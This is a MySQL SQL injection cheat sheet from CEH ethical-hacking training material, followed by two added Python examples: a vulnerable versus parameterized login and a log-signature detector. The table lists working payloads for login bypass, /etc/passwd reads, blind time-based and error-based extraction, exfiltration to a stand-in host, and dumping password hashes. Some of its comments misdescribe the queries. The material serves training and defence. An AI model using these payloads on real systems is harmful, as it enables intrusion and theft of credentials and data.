Query: Command
Version: SELECT @@VERSION; -- This command retrieves the system information of the current installation of the SQL server.
 SELECT version(); -- This command selects the specific version of the server.
List Users: SELECT user FROM mysql.user; -- This command lists the column 'user' from the table 'mysql.user'.
Current User: SELECT user(); -- This command obtains the current MySQL user name and hostname.
 SELECT system_user(); -- This command obtains the current value of system_user.
List all Databases: SELECT schema_name FROM information_schema.schemata; -- For MySQL >= v5.0. This command obtains the column 'schema_name', which holds the list of databases, from the table 'schemata'.
 SELECT distinct(db) FROM mysql.db; -- priv
Current Database: SELECT database(); -- This command obtains the current MySQL database.
List Tables: SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'; -- This command obtains the column 'table_name' from the table 'information_schema.tables' where table_schema has the value 'tblUsers'. tblUsers -> tablename
Column Names: SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers'; -- This command obtains the columns 'table_name' and 'column_name' from the table 'information_schema.tables' where table_schema has the value 'tblUsers'. tblUsers -> tablename
 SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- This command obtains the columns 'table_name' and 'column_name' from the table 'information_schema.tables' where table_schema has the value 'username'.
Select Nth Row: SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; -- This command returns rows numbered from 0.
 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; -- This command returns rows numbered from 0.
Select Nth Char: SELECT substr('abcd', 3, 1); -- This command returns c.
If Statement: SELECT if(1=1,'foo','bar'); -- returns 'foo'
Case Statement: SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- This command returns A.
Comments: SELECT 1; #comment -- This command is used for writing a comment.
 SELECT /*comment*/1; -- This command is used to comment out a statement.
String without Quotes: SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)); -- This command returns 'KLM'.
Time Delay: SELECT BENCHMARK(1000000,MD5('A'));
 SELECT SLEEP(5); -- >= 5.0.12. This command triggers a measurable time delay.
Command Execution: If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
Make DNS Requests: N/A
Load File: ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
 SELECT LOAD_FILE(0x633A5C626F6F742E696E69); -- This command will show the content of c:\boot.ini.

Log in as admin user: DROP sampletable;--
 DROP sampletable;#
 Username: admin'--
         : admin' or '1'='1'--
 SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password'
 This command lists all the users from the column 'members' having $username value as 'admin' and $password value as 'password'.
List Passwords: SELECT user, password FROM mysql.user; -- This command retrieves the columns 'user' and 'password' from the table 'mysql.user'.
 SELECT user, password FROM mysql.user LIMIT 1,1; -- This command retrieves the columns 'user' and 'password' from the table 'mysql.user' with LIMIT 1,1.
 SELECT password FROM mysql.user WHERE user = 'root'; -- This command retrieves the column 'password' from the table 'mysql.user' having user value as 'root'.
List Password Hashes: SELECT host, user, password FROM mysql.user; -- This command lists columns 'host', 'user' and 'password' from the table 'mysql.user'.
Bulk Insert: SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- This command is used to insert a file content to a table.
Create Users: CREATE USER username IDENTIFIED BY 'password'; -- This command creates a username 'USER' who authenticates by password to log on to the database.
Drop User: DROP USER username; -- This command drops a username 'USER' from the table.
Make User DBA: GRANT ALL PRIVILEGES ON *.* TO username@'%'; -- This command grants DBA privileges to a user.
Local File Access: ...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- This command allows you to read only world-readable files.
 SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- This command allows you to write to the file system.
Hostname, IP Address: SELECT @@hostname; -- This command obtains the Hostname and IP address of a system.
Error Based SQLi attack: To throw conversion errors.
 (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)); -- This command is used to receive integer inputs.
 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'; -- This command is used to receive string inputs.
Clear SQLi Tests: For Boolean SQL injection and silent attacks
 product.php?id=4
 product.php?id=5-1
 product.php?id=4 OR 1=1
 product.php?id=-1 OR 17-7=10
 These commands can be used to test for Boolean SQL injection and silent attacks.
Blind SQL Injection (Time Based): SLEEP(25)--
 SELECT BENCHMARK(1000000,MD5('A'));
 ProductID=1 OR SLEEP(25)=0 LIMIT 1--
 ProductID=1) OR SLEEP(25)=0 LIMIT 1--
 ProductID=1' OR SLEEP(25)=0 LIMIT 1--
 ProductID=1') OR SLEEP(25)=0 LIMIT 1--
 ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
 ProductID=SELECT SLEEP(25)--
 These commands trigger a measurable time delay.
Time-based SQLi exploitation: ?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTION}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--
 {INJECTION} = the query you want to run.
 If the condition is true, the response arrives after 14 seconds. If it is false, it will be delayed for one second.
Out of Band Channel: ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')));
 This command makes an NBNS query request/DNS resolution request to yourhost.com.
 ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt');
 This command writes data to your shared folder/file.
 {INJECTION} = the query you want to run.
Default Databases: information_schema (>= mysql 5.0), mysql
Path of DB files: SELECT @@datadir; -- C:\AppServ\MySQL\data\
Location of DB Files: SELECT @@datadir; -- This command obtains the location of DB files.
Privileges: SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- This command lists user privileges.
 SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- This command lists various types of privileges (list user privs).
 SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- This command lists privileges on databases (schemas).
 SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- This command lists privileges on columns.

Source: CEH v.10. Module 15: SQL Injection
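
The "Log in as admin user" row works only when user input is pasted into the SQL text. The following is an added example, not part of the original table: it shows that query built by concatenation beside the parameterized form that defeats the same inputs. It assumes Python's built-in sqlite3 as a stand-in for MySQL, and the table contents and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the table's `members` example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    # Plain-text password only to keep the example short; store a hash in practice.
    db.execute("INSERT INTO members VALUES ('admin', 's3cret-constructed')")
    return db

def login_concat(db, username, password):
    """Vulnerable form: input becomes part of the SQL statement itself."""
    sql = ("SELECT * FROM members WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_param(db, username, password):
    """Hardened form: placeholders keep input as data, never as SQL syntax."""
    sql = "SELECT * FROM members WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def compare(db, username, password):
    """Return (concat_result, param_result) for one credential pair."""
    return (login_concat(db, username, password),
            login_param(db, username, password))

if __name__ == "__main__":
    db = make_db()
    # Inputs taken from the "Log in as admin user" row, plus a valid login.
    for user, pw in [("admin'--", "x"),
                     ("admin' or '1'='1'--", ""),
                     ("admin", "wrong"),
                     ("admin", "s3cret-constructed")]:
        print(repr(user), compare(db, user, pw))
```

With the concatenated query the comment marker removes the password check; with placeholders the same string is compared literally against the username column and matches nothing.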
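
The time-delay, file-access, UNION and schema-enumeration rows share a small set of MySQL keywords that can be flagged in web server logs. The following is an added example, not part of the original table: a signature check over constructed request lines, with rule names and sample lines invented for illustration. It decodes the request target twice so that double URL encoding does not hide the keywords.

```python
import re
from urllib.parse import unquote_plus

# Signatures for MySQL constructs that appear in the table above.
RULES = {
    "time_delay":   re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "file_access":  re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum":  re.compile(r"\binformation_schema\b|\bmysql\.user\b", re.I),
    "error_based":  re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    "tautology":    re.compile(r"\bor\s+'?\d+'?\s*=\s*'?\d+", re.I),
}

# Constructed request lines (not real traffic).
SAMPLE_LOG = [
    "GET /product.php?id=4 HTTP/1.1",
    "GET /product.php?id=4%20OR%201=1 HTTP/1.1",
    "GET /product.php?ProductID=1%27%20OR%20SLEEP(25)=0%20LIMIT%201--%20 HTTP/1.1",
    "GET /item?id=-1%2520UNION%2520ALL%2520SELECT%2520LOAD_FILE(%2527/etc/passwd%2527) HTTP/1.1",
    "GET /search?q=sleep+apnea+or+insomnia HTTP/1.1",
    "GET /product.php?id=5-1 HTTP/1.1",
]

def classify(request_line):
    """Return the sorted names of the rules matched by one request line."""
    parts = request_line.split(" ")
    # Everything between the method and the protocol version is the target.
    target = " ".join(parts[1:-1]) if len(parts) >= 3 else request_line
    decoded = unquote_plus(unquote_plus(target))   # undo single and double encoding
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)   # inline comments used as spacing
    return sorted(name for name, rx in RULES.items() if rx.search(decoded))

def scan(lines):
    """Map each suspicious line to the rules it matched."""
    hits = {}
    for line in lines:
        matched = classify(line)
        if matched:
            hits[line] = matched
    return hits

if __name__ == "__main__":
    for line, matched in scan(SAMPLE_LOG).items():
        print(matched, line)
```

The arithmetic probe `id=5-1` matches no rule, which is the limit of keyword signatures: such requests are only visible by comparing responses or by using parameterized queries so the probe has no effect.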